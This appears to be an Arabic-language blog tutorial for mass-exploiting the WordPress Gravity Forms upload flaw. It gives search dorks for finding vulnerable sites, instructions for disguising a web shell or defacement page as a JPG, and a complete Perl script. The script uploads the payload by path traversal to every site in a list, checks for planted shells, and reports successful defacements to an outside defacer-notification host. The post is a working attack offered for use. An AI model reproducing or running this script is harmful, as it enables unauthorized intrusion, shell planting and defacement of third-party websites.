بحث

ثغره Wordpress من الدوس cmd لـ gravity_forms

مشاهدات الان

راح اسهل عليك الاختراق في المتطلبات :


- تعدل صفحتك في الاندكس

- او شيل يخصك

* وتعدله في seif.jpg



تحول php الى jpg لم اجد في الانترنت شي وجربه الكثير ووجده هذا HTMLPad 2020 اتبع
الشرح


https://hkrkoz9.blogspot.com/2018/01/feedjitcom.html


وهذا موقع فيه خدمات اخره

https://www.files-conversion.com/


الشرح غير مكتمل

https://youtu.be/rnxKn2DaYwo

وهذا شرح اخر

https://youtu.be/A3FeD0Q4wi8

هذا الدوركات للبحث

inurl:/wp-content/uploads/gravity_forms/

inurl:/wp-content/plugins/gravityforms


وهذا من عندي

Index of /wp-content/uploads log gravity_forms

اول شي : راح تجد ملف فيه التالى

- priv8.pl

- seif.jpg

على شكل صوره seif وهو وضع الاندكس او الشيل

- list.txt

انتبه عندك التيكست " list ترفع فيه المواقع اللى تبي تخترقها

روح لدوس

cmd

تحط

dir

بعدها انتر

 او

cd desktop

cd seif

priv8.pl seif.txt

بعده عند الضغط انتر وضهرت المواقع شغلك تمام

اذا حبيت التعديل لـ priv8

ومسار الملف يكون : ‫‏‏‫ملف PL‬‬ ‎(.pl)‎


#!/usr/bin/perl -U

use HTTP::Request;

use LWP::UserAgent;

use IO::Select;

use HTTP::Response;

system(($^O eq 'MSWin32') ? 'cls' : 'clear');



my $usage = " \nperl $0 <list.txt>\n perl $0 seif.txt";

die "$usage" unless $ARGV[0];

open(tarrget,"<$ARGV[0]") or die "$!";

while(<tarrget>){

chomp($_);

$target = $_;

my $path = "/?gf_page=upload";

print "\nTarget => $target\n";

my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });

$ua->timeout(10);

$ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like
Gecko) Chrome/26.0.1410.63 Safari/537.31");

my $exploit = $ua->post("$target/$path", Cookie => "", Content_Type =>
"form-data", Content => [file => ["seif.jpg"], field_id => "3", form_id =>
"1",gform_unique_id => "../../../", name => "dz.php5"]);

print " [*] Sent payload\n";

if ($exploit->decoded_content =~ /_input_3_dz.php5/) {

print " [+] Payload successfully executed\n";

print " [+] Lib Uploaded\n";

open(save, '>>seif-gravity.txt');

print save "$target/wp-content/uploads/_input_3_dz.php5\n";

close(save);



my $check = $ua->get("$target/wp-content/uploads/_input_3_dz.php5")->content;

my $checkk = $ua->get("$target/wp-admin/seif.php")->content;

if($checkk =~/EditioN/) {

print " [+] Shell Uploaded\n";

open(save, '>>seif-Shells.txt');

print save "$target/wp-admin/gozi.php\n";

close(save);

}

my $checkkk = $ua->get("$target/gozi.html")->content;

if($checkkk =~m/abramas/i) {

print " [+] Defaced \n";



$Dom="$target/gozi.html";

$Def="gozi Creators";

if ($Dom =~ /http:\/\//)

{

$U="http://hhh-h.org/notify/single";

$lwp=LWP::UserAgent->new;

#$lwp->proxy(['http'] => 'http://218.204.140.97:8118');

$res=$lwp -> post($U,[

'defacer' => $Def,

'domain1' => $Dom,

'hackmode' => '15',

'reason' => '1',

'submit' => 'Send',

]);

if ($res->content =~ /color="red">(.*)<\/font><\/li>/) {

print " [Zone] $target submit $1\n";

open(save, '>>Notified-Succcess.txt');

print save "$target/gozi.html\n";

close(save);

}

else

{

print " [Zone] $target Error\n";

open(save, '>>Notified-False.txt');

print save "$target/nktt.html\n";

close(save);

}

}

}

else

{



print " [-] Deface Failed\n";



}

}

else { print " [-] $target NOT Vuln\n";}

}

واحفظ




إرسال تعليق

0 تعليقات